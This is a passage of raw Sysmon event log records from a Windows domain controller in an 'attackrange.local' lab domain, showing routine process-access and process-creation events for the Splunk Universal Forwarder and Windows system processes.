13:37:47.468{59A5CD1D-8F2B-6005-EE00-00000000A301}22683988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F2B-6005-EE00-00000000A301}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8F2B-6005-EE00-00000000A301}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.327{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F2B-6005-EE00-00000000A301}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:47.328{59A5CD1D-8F2B-6005-EE00-00000000A301}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.734{59A5CD1D-8F2C-6005-F000-00000000A301}34524608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F2C-6005-F000-00000000A301}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F2C-6005-F000-00000000A301}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:48.593{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F2C-6005-F000-00000000A301}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 